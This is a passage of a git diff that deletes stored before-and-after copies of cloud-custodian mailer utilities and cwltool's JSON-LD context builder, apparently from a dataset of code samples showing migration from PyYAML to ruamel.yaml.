-+from __future__ import absolute_import, division, print_function, unicode_literals -+ - import datetime - import jinja2 - import json - import os --import yaml -+from ruamel import yaml - --from io import StringIO - from dateutil import parser - from dateutil.tz import gettz - -@@ -92,6 +93,7 @@ def setup_defaults(config): - config.setdefault('region', 'us-east-1') - config.setdefault('ses_region', config.get('region')) - config.setdefault('memory', 1024) -+ config.setdefault('runtime', 'python2.7') - config.setdefault('timeout', 300) - config.setdefault('subnets', None) - config.setdefault('security_groups', None) -@@ -111,9 +113,7 @@ def get_date_time_delta(delta): - - - def format_struct(evt): -- buf = StringIO() -- json.dump(evt, buf, indent=2) -- return buf.getvalue() -+ return json.dumps(evt, indent=2, ensure_ascii=False) - - - def get_resource_tag_value(resource, k): -@@ -268,5 +268,4 @@ def resource_format(resource, resource_type): - resource['CreationDateTime'], - resource['TableStatus']) - else: -- print("Unknown resource type", resource_type) - return "%s" % format_struct(resource) diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.source.py deleted file mode 100644 index e593ffc..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.source.py +++ /dev/null @@ -1,272 +0,0 @@ -# Copyright 2015-2017 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
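The utils.py hunk above replaces the StringIO-buffer-plus-json.dump pair with a single json.dumps call and adds ensure_ascii=False. A minimal, self-contained sketch of the before/after behavior (the sample event dict is hypothetical):

import json
from io import StringIO

evt = {"InstanceId": "i-0abc123", "Tags": [{"Key": "Name", "Value": "wébserver"}]}  # hypothetical event

# Before: write into an in-memory buffer, then read it back out.
buf = StringIO()
json.dump(evt, buf, indent=2)
old = buf.getvalue()

# After: one call; ensure_ascii=False keeps non-ASCII tag values readable
# instead of escaping them to \uXXXX sequences.
new = json.dumps(evt, indent=2, ensure_ascii=False)

assert json.loads(old) == json.loads(new)  # same structure, only escaping differs
print(new)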
-import datetime -import jinja2 -import json -import os -import yaml - -from io import StringIO -from dateutil import parser -from dateutil.tz import gettz - - -def get_jinja_env(): - env = jinja2.Environment(trim_blocks=True, autoescape=False) - env.filters['yaml_safe'] = yaml.safe_dump - env.filters['date_time_format'] = date_time_format - env.filters['get_date_time_delta'] = get_date_time_delta - env.globals['format_resource'] = resource_format - env.globals['format_struct'] = format_struct - env.globals['get_resource_tag_value'] = get_resource_tag_value - env.loader = jinja2.FileSystemLoader( - [ - os.path.abspath( - os.path.join( - os.path.dirname(os.path.abspath(__file__)), - '..', - 'msg-templates')), os.path.abspath('/') - ] - ) - return env - - -def get_rendered_jinja(target, sqs_message, resources, logger): - env = get_jinja_env() - mail_template = sqs_message['action'].get('template') - if not os.path.isabs(mail_template): - mail_template = '%s.j2' % mail_template - try: - template = env.get_template(mail_template) - except Exception as error_msg: - logger.error("Invalid template reference %s\n%s" % (mail_template, error_msg)) - return - rendered_jinja = template.render( - recipient=target, - resources=resources, - account=sqs_message.get('account', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - region=sqs_message.get('region', '')) - return rendered_jinja - - -# eg, target_tag_keys could be resource-owners ['Owners', 'SupportTeam'] -# and this function would go through the resource and look for any tag keys -# that match Owners or SupportTeam, and return those values as targets -def get_resource_tag_targets(resource, target_tag_keys): - if 'Tags' not in resource: - return [] - tags = {tag['Key']: tag['Value'] for tag in resource['Tags']} - targets = [] - for target_tag_key in target_tag_keys: - if target_tag_key in tags: - targets.append(tags[target_tag_key]) - return targets - - -def get_message_subject(sqs_message): - default_subject = 'Custodian notification - %s' % (sqs_message['policy']['name']) - subject = sqs_message['action'].get('subject', default_subject) - jinja_template = jinja2.Template(subject) - subject = jinja_template.render( - account=sqs_message.get('account', ''), - region=sqs_message.get('region', '') - ) - return subject - - -def setup_defaults(config): - config.setdefault('region', 'us-east-1') - config.setdefault('ses_region', config.get('region')) - config.setdefault('memory', 1024) - config.setdefault('timeout', 300) - config.setdefault('subnets', None) - config.setdefault('security_groups', None) - config.setdefault('contact_tags', []) - config.setdefault('ldap_uri', None) - config.setdefault('ldap_bind_dn', None) - config.setdefault('ldap_bind_user', None) - config.setdefault('ldap_bind_password', None) - - -def date_time_format(utc_str, tz_str='US/Eastern', format='%Y %b %d %H:%M %Z'): - return parser.parse(utc_str).astimezone(gettz(tz_str)).strftime(format) - - -def get_date_time_delta(delta): - return str(datetime.datetime.now().replace(tzinfo=gettz('UTC')) + datetime.timedelta(delta)) - - -def format_struct(evt): - buf = StringIO() - json.dump(evt, buf, indent=2) - return buf.getvalue() - - -def get_resource_tag_value(resource, k): - for t in resource.get('Tags', []): - if t['Key'] == k: - return t['Value'] - return '' - - -def resource_format(resource, resource_type): - if resource_type == 'ec2': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s 
%s %s %s" % ( - resource['InstanceId'], - resource.get('VpcId', 'NO VPC!'), - resource['InstanceType'], - resource.get('LaunchTime'), - tag_map.get('Name', ''), - resource.get('PrivateIpAddress')) - elif resource_type == 'ami': - return "%s %s %s" % ( - resource['Name'], resource['ImageId'], resource['CreationDate']) - elif resource_type == 's3': - return "%s" % (resource['Name']) - elif resource_type == 'ebs': - return "%s %s %s %s" % ( - resource['VolumeId'], - resource['Size'], - resource['State'], - resource['CreateTime']) - elif resource_type == 'rds': - return "%s %s %s %s" % ( - resource['DBInstanceIdentifier'], - "%s-%s" % ( - resource['Engine'], resource['EngineVersion']), - resource['DBInstanceClass'], - resource['AllocatedStorage']) - elif resource_type == 'asg': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s" % ( - resource['AutoScalingGroupName'], - tag_map.get('Name', ''), - "instances: %d" % (len(resource.get('Instances', [])))) - elif resource_type == 'elb': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - if 'ProhibitedPolicies' in resource: - return "%s %s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones']), - "prohibited_policies: %s" % ','.join( - resource['ProhibitedPolicies'])) - return "%s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones'])) - elif resource_type == 'redshift': - return "%s %s %s" % ( - resource['ClusterIdentifier'], - 'nodes:%d' % len(resource['ClusterNodes']), - 'encrypted:%s' % resource['Encrypted']) - elif resource_type == 'emr': - return "%s status:%s" % ( - resource['Id'], - resource['Status']['State']) - elif resource_type == 'cfn': - return "%s" % ( - resource['StackName']) - elif resource_type == 'launch-config': - return "%s" % ( - resource['LaunchConfigurationName']) - elif resource_type == 'security-group': - name = resource.get('GroupName', '') - for t in resource.get('Tags', ()): - if t['Key'] == 'Name': - name = t['Value'] - return "%s %s %s inrules: %d outrules: %d" % ( - name, - resource['GroupId'], - resource.get('VpcId', 'na'), - len(resource.get('IpPermissions', ())), - len(resource.get('IpPermissionsEgress', ()))) - elif resource_type == 'log-group': - if 'lastWrite' in resource: - return "name: %s last_write: %s" % ( - resource['logGroupName'], - resource['lastWrite']) - return "name: %s" % (resource['logGroupName']) - elif resource_type == 'cache-cluster': - return "name: %s created: %s status: %s" % ( - resource['CacheClusterId'], - resource['CacheClusterCreateTime'], - resource['CacheClusterStatus']) - elif resource_type == 'cache-snapshot': - return "name: %s cluster: %s source: %s" % ( - resource['SnapshotName'], - resource['CacheClusterId'], - resource['SnapshotSource']) - elif resource_type == 'redshift-snapshot': - return "name: %s db: %s" % ( - resource['SnapshotIdentifier'], - resource['DBName']) - elif resource_type == 'ebs-snapshot': - return "name: %s date: %s" % ( - resource['SnapshotId'], - resource['StartTime']) - elif resource_type == 'subnet': - return "%s %s %s %s %s %s" % ( - resource['SubnetId'], - resource['VpcId'], - resource['AvailabilityZone'], - resource['State'], - resource['CidrBlock'], - resource['AvailableIpAddressCount']) - elif resource_type == 'account': - return " %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 
'cloudtrail': - return " %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 'vpc': - return "%s " % ( - resource['VpcId']) - elif resource_type == 'iam-group': - return " %s %s %s" % ( - resource['GroupName'], - resource['Arn'], - resource['CreateDate']) - elif resource_type == 'rds-snapshot': - return " %s %s %s" % ( - resource['DBSnapshotIdentifier'], - resource['DBInstanceIdentifier'], - resource['SnapshotCreateTime']) - elif resource_type == 'iam-user': - return " %s " % ( - resource['UserName']) - elif resource_type == 'iam-role': - return " %s %s " % ( - resource['RoleName'], - resource['CreateDate']) - elif resource_type == 'iam-policy': - return " %s " % ( - resource['PolicyName']) - elif resource_type == 'iam-profile': - return " %s " % ( - resource['InstanceProfileId']) - elif resource_type == 'dynamodb-table': - return "name: %s created: %s status: %s" % ( - resource['TableName'], - resource['CreationDateTime'], - resource['TableStatus']) - else: - print("Unknown resource type", resource_type) - return "%s" % format_struct(resource) diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.target.py deleted file mode 100644 index 8178f25..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.target.py +++ /dev/null @@ -1,271 +0,0 @@ -# Copyright 2015-2017 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
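The target version that follows keeps every yaml call site untouched; only the import changes, because `from ruamel import yaml` exposes a PyYAML-style module API. A sketch of the import-only swap as used by get_jinja_env (this assumes ruamel.yaml's legacy safe_dump entry point, which newer releases deprecate; the template and config values are illustrative):

from ruamel import yaml  # was: import yaml
import jinja2

# Same filter registration as get_jinja_env() above: the migration is
# import-only because ruamel mirrors PyYAML's safe_dump signature.
env = jinja2.Environment(trim_blocks=True, autoescape=False)
env.filters['yaml_safe'] = yaml.safe_dump

template = env.from_string("{{ cfg | yaml_safe }}")
print(template.render(cfg={"queue_url": "https://sqs.example/q"}))  # hypothetical config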
-from __future__ import absolute_import, division, print_function, unicode_literals - -import datetime -import jinja2 -import json -import os -from ruamel import yaml - -from dateutil import parser -from dateutil.tz import gettz - - -def get_jinja_env(): - env = jinja2.Environment(trim_blocks=True, autoescape=False) - env.filters['yaml_safe'] = yaml.safe_dump - env.filters['date_time_format'] = date_time_format - env.filters['get_date_time_delta'] = get_date_time_delta - env.globals['format_resource'] = resource_format - env.globals['format_struct'] = format_struct - env.globals['get_resource_tag_value'] = get_resource_tag_value - env.loader = jinja2.FileSystemLoader( - [ - os.path.abspath( - os.path.join( - os.path.dirname(os.path.abspath(__file__)), - '..', - 'msg-templates')), os.path.abspath('/') - ] - ) - return env - - -def get_rendered_jinja(target, sqs_message, resources, logger): - env = get_jinja_env() - mail_template = sqs_message['action'].get('template') - if not os.path.isabs(mail_template): - mail_template = '%s.j2' % mail_template - try: - template = env.get_template(mail_template) - except Exception as error_msg: - logger.error("Invalid template reference %s\n%s" % (mail_template, error_msg)) - return - rendered_jinja = template.render( - recipient=target, - resources=resources, - account=sqs_message.get('account', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - region=sqs_message.get('region', '')) - return rendered_jinja - - -# eg, target_tag_keys could be resource-owners ['Owners', 'SupportTeam'] -# and this function would go through the resource and look for any tag keys -# that match Owners or SupportTeam, and return those values as targets -def get_resource_tag_targets(resource, target_tag_keys): - if 'Tags' not in resource: - return [] - tags = {tag['Key']: tag['Value'] for tag in resource['Tags']} - targets = [] - for target_tag_key in target_tag_keys: - if target_tag_key in tags: - targets.append(tags[target_tag_key]) - return targets - - -def get_message_subject(sqs_message): - default_subject = 'Custodian notification - %s' % (sqs_message['policy']['name']) - subject = sqs_message['action'].get('subject', default_subject) - jinja_template = jinja2.Template(subject) - subject = jinja_template.render( - account=sqs_message.get('account', ''), - region=sqs_message.get('region', '') - ) - return subject - - -def setup_defaults(config): - config.setdefault('region', 'us-east-1') - config.setdefault('ses_region', config.get('region')) - config.setdefault('memory', 1024) - config.setdefault('runtime', 'python2.7') - config.setdefault('timeout', 300) - config.setdefault('subnets', None) - config.setdefault('security_groups', None) - config.setdefault('contact_tags', []) - config.setdefault('ldap_uri', None) - config.setdefault('ldap_bind_dn', None) - config.setdefault('ldap_bind_user', None) - config.setdefault('ldap_bind_password', None) - - -def date_time_format(utc_str, tz_str='US/Eastern', format='%Y %b %d %H:%M %Z'): - return parser.parse(utc_str).astimezone(gettz(tz_str)).strftime(format) - - -def get_date_time_delta(delta): - return str(datetime.datetime.now().replace(tzinfo=gettz('UTC')) + datetime.timedelta(delta)) - - -def format_struct(evt): - return json.dumps(evt, indent=2, ensure_ascii=False) - - -def get_resource_tag_value(resource, k): - for t in resource.get('Tags', []): - if t['Key'] == k: - return t['Value'] - return '' - - -def resource_format(resource, resource_type): - if resource_type 
== 'ec2': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s %s %s %s" % ( - resource['InstanceId'], - resource.get('VpcId', 'NO VPC!'), - resource['InstanceType'], - resource.get('LaunchTime'), - tag_map.get('Name', ''), - resource.get('PrivateIpAddress')) - elif resource_type == 'ami': - return "%s %s %s" % ( - resource['Name'], resource['ImageId'], resource['CreationDate']) - elif resource_type == 's3': - return "%s" % (resource['Name']) - elif resource_type == 'ebs': - return "%s %s %s %s" % ( - resource['VolumeId'], - resource['Size'], - resource['State'], - resource['CreateTime']) - elif resource_type == 'rds': - return "%s %s %s %s" % ( - resource['DBInstanceIdentifier'], - "%s-%s" % ( - resource['Engine'], resource['EngineVersion']), - resource['DBInstanceClass'], - resource['AllocatedStorage']) - elif resource_type == 'asg': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s" % ( - resource['AutoScalingGroupName'], - tag_map.get('Name', ''), - "instances: %d" % (len(resource.get('Instances', [])))) - elif resource_type == 'elb': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - if 'ProhibitedPolicies' in resource: - return "%s %s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones']), - "prohibited_policies: %s" % ','.join( - resource['ProhibitedPolicies'])) - return "%s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones'])) - elif resource_type == 'redshift': - return "%s %s %s" % ( - resource['ClusterIdentifier'], - 'nodes:%d' % len(resource['ClusterNodes']), - 'encrypted:%s' % resource['Encrypted']) - elif resource_type == 'emr': - return "%s status:%s" % ( - resource['Id'], - resource['Status']['State']) - elif resource_type == 'cfn': - return "%s" % ( - resource['StackName']) - elif resource_type == 'launch-config': - return "%s" % ( - resource['LaunchConfigurationName']) - elif resource_type == 'security-group': - name = resource.get('GroupName', '') - for t in resource.get('Tags', ()): - if t['Key'] == 'Name': - name = t['Value'] - return "%s %s %s inrules: %d outrules: %d" % ( - name, - resource['GroupId'], - resource.get('VpcId', 'na'), - len(resource.get('IpPermissions', ())), - len(resource.get('IpPermissionsEgress', ()))) - elif resource_type == 'log-group': - if 'lastWrite' in resource: - return "name: %s last_write: %s" % ( - resource['logGroupName'], - resource['lastWrite']) - return "name: %s" % (resource['logGroupName']) - elif resource_type == 'cache-cluster': - return "name: %s created: %s status: %s" % ( - resource['CacheClusterId'], - resource['CacheClusterCreateTime'], - resource['CacheClusterStatus']) - elif resource_type == 'cache-snapshot': - return "name: %s cluster: %s source: %s" % ( - resource['SnapshotName'], - resource['CacheClusterId'], - resource['SnapshotSource']) - elif resource_type == 'redshift-snapshot': - return "name: %s db: %s" % ( - resource['SnapshotIdentifier'], - resource['DBName']) - elif resource_type == 'ebs-snapshot': - return "name: %s date: %s" % ( - resource['SnapshotId'], - resource['StartTime']) - elif resource_type == 'subnet': - return "%s %s %s %s %s %s" % ( - resource['SubnetId'], - resource['VpcId'], - resource['AvailabilityZone'], - resource['State'], - resource['CidrBlock'], - resource['AvailableIpAddressCount']) - elif resource_type == 'account': - return 
" %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 'cloudtrail': - return " %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 'vpc': - return "%s " % ( - resource['VpcId']) - elif resource_type == 'iam-group': - return " %s %s %s" % ( - resource['GroupName'], - resource['Arn'], - resource['CreateDate']) - elif resource_type == 'rds-snapshot': - return " %s %s %s" % ( - resource['DBSnapshotIdentifier'], - resource['DBInstanceIdentifier'], - resource['SnapshotCreateTime']) - elif resource_type == 'iam-user': - return " %s " % ( - resource['UserName']) - elif resource_type == 'iam-role': - return " %s %s " % ( - resource['RoleName'], - resource['CreateDate']) - elif resource_type == 'iam-policy': - return " %s " % ( - resource['PolicyName']) - elif resource_type == 'iam-profile': - return " %s " % ( - resource['InstanceProfileId']) - elif resource_type == 'dynamodb-table': - return "name: %s created: %s status: %s" % ( - resource['TableName'], - resource['CreationDateTime'], - resource['TableStatus']) - else: - return "%s" % format_struct(resource) diff --git a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.diff b/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.diff deleted file mode 100644 index 04b6f33..0000000 --- a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.diff +++ /dev/null @@ -1,180 +0,0 @@ -diff --git a/draft-4/salad/schema_salad/jsonld_context.py b/draft-4/salad/schema_salad/jsonld_context.py - index 4cadc611dfced4e1a818e6afbb215270fc2561b3..b9b65c0f4d7531c8a97690356ecf1a34214eaac2 100644 - --- a/draft-4/salad/schema_salad/jsonld_context.py - +++ b/draft-4/salad/schema_salad/jsonld_context.py -@@ -1,6 +1,11 @@ -+import collections - import shutil - import json --import yaml -+import ruamel.yaml as yaml -+try: -+ from ruamel.yaml import CSafeLoader as SafeLoader -+except ImportError: -+ from ruamel.yaml import SafeLoader # type: ignore - import os - import subprocess - import copy -@@ -11,62 +16,74 @@ import rdflib - from rdflib import Graph, URIRef - import rdflib.namespace - from rdflib.namespace import RDF, RDFS --try: -- import urlparse --except ImportError: -- import urllib.parse as urlparse -- unicode=str -- basestring=str -+import urlparse - import logging - from .aslist import aslist --if sys.version_info >= (2,7): -- import typing -+from typing import Any, cast, Dict, Iterable, Tuple, Union -+from .ref_resolver import Loader - - _logger = logging.getLogger("salad") - -+ - def pred(datatype, field, name, context, defaultBase, namespaces): -+ # type: (Dict[str, Union[Dict, str]], Dict, str, Loader.ContextType, str, Dict[str, rdflib.namespace.Namespace]) -> Union[Dict, str] - split = urlparse.urlsplit(name) - -- v = None -+ vee = None # type: Union[str, unicode] - - if split.scheme: -- v = name -- (ns, ln) = rdflib.namespace.split_uri(unicode(v)) -+ vee = name -+ (ns, ln) = rdflib.namespace.split_uri(unicode(vee)) - name = ln - if ns[0:-1] in namespaces: -- v = unicode(namespaces[ns[0:-1]][ln]) -- _logger.debug("name, v %s %s", name, v) -+ vee = unicode(namespaces[ns[0:-1]][ln]) -+ _logger.debug("name, v %s %s", name, vee) -+ -+ v = None # type: Any - - if field and "jsonldPredicate" in field: - if isinstance(field["jsonldPredicate"], dict): - v = {} - for k, val in field["jsonldPredicate"].items(): -- v[("@"+k[1:] if 
k.startswith("_") else k)] = val -+ v[("@" + k[1:] if k.startswith("_") else k)] = val - else: - v = field["jsonldPredicate"] - elif "jsonldPredicate" in datatype: -- for d in datatype["jsonldPredicate"]: -- if d["symbol"] == name: -- v = d["predicate"] -+ if isinstance(datatype["jsonldPredicate"], collections.Iterable): -+ for d in datatype["jsonldPredicate"]: -+ if isinstance(d, dict): -+ if d["symbol"] == name: -+ v = d["predicate"] -+ else: -+ raise Exception( -+ "entries in the jsonldPredicate List must be " -+ "Dictionaries") -+ else: -+ raise Exception("jsonldPredicate must be a List of Dictionaries.") - # if not v: - # if field and "jsonldPrefix" in field: - # defaultBase = field["jsonldPrefix"] - # elif "jsonldPrefix" in datatype: - # defaultBase = datatype["jsonldPrefix"] - -- if not v: -- v = defaultBase + name -+ ret = v or vee -+ -+ if not ret: -+ ret = defaultBase + name - - if name in context: -- if context[name] != v: -- raise Exception("Predicate collision on %s, '%s' != '%s'" % (name, context[name], v)) -+ if context[name] != ret: -+ raise Exception("Predicate collision on %s, '%s' != '%s'" % -+ (name, context[name], ret)) - else: -- _logger.debug("Adding to context '%s' %s (%s)", name, v, type(v)) -- context[name] = v -+ _logger.debug("Adding to context '%s' %s (%s)", name, ret, type(ret)) -+ context[name] = ret -+ -+ return ret - -- return v - - def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): -+ # type: (Dict[str, Any], Graph, Loader.ContextType, str, Dict[str, rdflib.namespace.Namespace], str) -> None - if t["type"] == "record": - recordname = t["name"] - -@@ -86,12 +103,14 @@ def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): - predicate = "%s:%s" % (defaultPrefix, recordname) - - if context.get(recordname, predicate) != predicate: -- raise Exception("Predicate collision on '%s', '%s' != '%s'" % (recordname, context[recordname], predicate)) -+ raise Exception("Predicate collision on '%s', '%s' != '%s'" % ( -+ recordname, context[recordname], predicate)) - - if not recordname: - raise Exception() - -- _logger.debug("Adding to context '%s' %s (%s)", recordname, predicate, type(predicate)) -+ _logger.debug("Adding to context '%s' %s (%s)", -+ recordname, predicate, type(predicate)) - context[recordname] = predicate - - for i in t.get("fields", []): -@@ -119,7 +138,8 @@ def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): - # TODO generate range from datatype. 
- - if isinstance(i["type"], dict) and "name" in i["type"]: -- process_type(i["type"], g, context, defaultBase, namespaces, defaultPrefix) -+ process_type(i["type"], g, context, defaultBase, -+ namespaces, defaultPrefix) - - if "extends" in t: - for e in aslist(t["extends"]): -@@ -132,31 +152,26 @@ def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): - - - def salad_to_jsonld_context(j, schema_ctx): -- context = {} -+ # type: (Iterable, Dict[str, Any]) -> Tuple[Loader.ContextType, Graph] -+ context = {} # type: Loader.ContextType - namespaces = {} - g = Graph() - defaultPrefix = "" - -- for k,v in schema_ctx.items(): -+ for k, v in schema_ctx.items(): - context[k] = v - namespaces[k] = rdflib.namespace.Namespace(v) - - if "@base" in context: -- defaultBase = context["@base"] -+ defaultBase = cast(str, context["@base"]) - del context["@base"] - else: - defaultBase = "" - -- for k,v in namespaces.items(): -+ for k, v in namespaces.items(): - g.bind(k, v) - - for t in j: - process_type(t, g, context, defaultBase, namespaces, defaultPrefix) - - return (context, g) -- --if __name__ == "__main__": -- with open(sys.argv[1]) as f: -- j = yaml.load(f) -- (ctx, g) = salad_to_jsonld_context(j) -- print(json.dumps(ctx, indent=4, sort_keys=True)) diff --git a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.source.py b/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.source.py deleted file mode 100644 index 33028f1..0000000 --- a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.source.py +++ /dev/null @@ -1,162 +0,0 @@ -import shutil -import json -import yaml -import os -import subprocess -import copy -import pprint -import re -import sys -import rdflib -from rdflib import Graph, URIRef -import rdflib.namespace -from rdflib.namespace import RDF, RDFS -try: - import urlparse -except ImportError: - import urllib.parse as urlparse - unicode=str - basestring=str -import logging -from .aslist import aslist -if sys.version_info >= (2,7): - import typing - -_logger = logging.getLogger("salad") - -def pred(datatype, field, name, context, defaultBase, namespaces): - split = urlparse.urlsplit(name) - - v = None - - if split.scheme: - v = name - (ns, ln) = rdflib.namespace.split_uri(unicode(v)) - name = ln - if ns[0:-1] in namespaces: - v = unicode(namespaces[ns[0:-1]][ln]) - _logger.debug("name, v %s %s", name, v) - - if field and "jsonldPredicate" in field: - if isinstance(field["jsonldPredicate"], dict): - v = {} - for k, val in field["jsonldPredicate"].items(): - v[("@"+k[1:] if k.startswith("_") else k)] = val - else: - v = field["jsonldPredicate"] - elif "jsonldPredicate" in datatype: - for d in datatype["jsonldPredicate"]: - if d["symbol"] == name: - v = d["predicate"] - # if not v: - # if field and "jsonldPrefix" in field: - # defaultBase = field["jsonldPrefix"] - # elif "jsonldPrefix" in datatype: - # defaultBase = datatype["jsonldPrefix"] - - if not v: - v = defaultBase + name - - if name in context: - if context[name] != v: - raise Exception("Predicate collision on %s, '%s' != '%s'" % (name, context[name], v)) - else: - _logger.debug("Adding to context '%s' %s (%s)", name, v, type(v)) - context[name] = v - - return v - -def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): - if t["type"] == "record": - recordname = t["name"] - - _logger.debug("Processing record %s\n", t) - - classnode = 
URIRef(recordname) - g.add((classnode, RDF.type, RDFS.Class)) - - split = urlparse.urlsplit(recordname) - if "jsonldPrefix" in t: - predicate = "%s:%s" % (t["jsonldPrefix"], recordname) - elif split.scheme: - (ns, ln) = rdflib.namespace.split_uri(unicode(recordname)) - predicate = recordname - recordname = ln - else: - predicate = "%s:%s" % (defaultPrefix, recordname) - - if context.get(recordname, predicate) != predicate: - raise Exception("Predicate collision on '%s', '%s' != '%s'" % (recordname, context[recordname], predicate)) - - if not recordname: - raise Exception() - - _logger.debug("Adding to context '%s' %s (%s)", recordname, predicate, type(predicate)) - context[recordname] = predicate - - for i in t.get("fields", []): - fieldname = i["name"] - - _logger.debug("Processing field %s", i) - - v = pred(t, i, fieldname, context, defaultPrefix, namespaces) - - if isinstance(v, basestring): - v = v if v[0] != "@" else None - else: - v = v["_@id"] if v.get("_@id", "@")[0] != "@" else None - - if v: - (ns, ln) = rdflib.namespace.split_uri(unicode(v)) - if ns[0:-1] in namespaces: - propnode = namespaces[ns[0:-1]][ln] - else: - propnode = URIRef(v) - - g.add((propnode, RDF.type, RDF.Property)) - g.add((propnode, RDFS.domain, classnode)) - - # TODO generate range from datatype. - - if isinstance(i["type"], dict) and "name" in i["type"]: - process_type(i["type"], g, context, defaultBase, namespaces, defaultPrefix) - - if "extends" in t: - for e in aslist(t["extends"]): - g.add((classnode, RDFS.subClassOf, URIRef(e))) - elif t["type"] == "enum": - _logger.debug("Processing enum %s", t["name"]) - - for i in t["symbols"]: - pred(t, None, i, context, defaultBase, namespaces) - - -def salad_to_jsonld_context(j, schema_ctx): - context = {} - namespaces = {} - g = Graph() - defaultPrefix = "" - - for k,v in schema_ctx.items(): - context[k] = v - namespaces[k] = rdflib.namespace.Namespace(v) - - if "@base" in context: - defaultBase = context["@base"] - del context["@base"] - else: - defaultBase = "" - - for k,v in namespaces.items(): - g.bind(k, v) - - for t in j: - process_type(t, g, context, defaultBase, namespaces, defaultPrefix) - - return (context, g) - -if __name__ == "__main__": - with open(sys.argv[1]) as f: - j = yaml.load(f) - (ctx, g) = salad_to_jsonld_context(j) - print(json.dumps(ctx, indent=4, sort_keys=True)) diff --git a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.target.py b/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.target.py deleted file mode 100644 index 79d9833..0000000 --- a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.target.py +++ /dev/null @@ -1,177 +0,0 @@ -import collections -import shutil -import json -import ruamel.yaml as yaml -try: - from ruamel.yaml import CSafeLoader as SafeLoader -except ImportError: - from ruamel.yaml import SafeLoader # type: ignore -import os -import subprocess -import copy -import pprint -import re -import sys -import rdflib -from rdflib import Graph, URIRef -import rdflib.namespace -from rdflib.namespace import RDF, RDFS -import urlparse -import logging -from .aslist import aslist -from typing import Any, cast, Dict, Iterable, Tuple, Union -from .ref_resolver import Loader - -_logger = logging.getLogger("salad") - - -def pred(datatype, field, name, context, defaultBase, namespaces): - # type: (Dict[str, Union[Dict, str]], Dict, str, Loader.ContextType, str, 
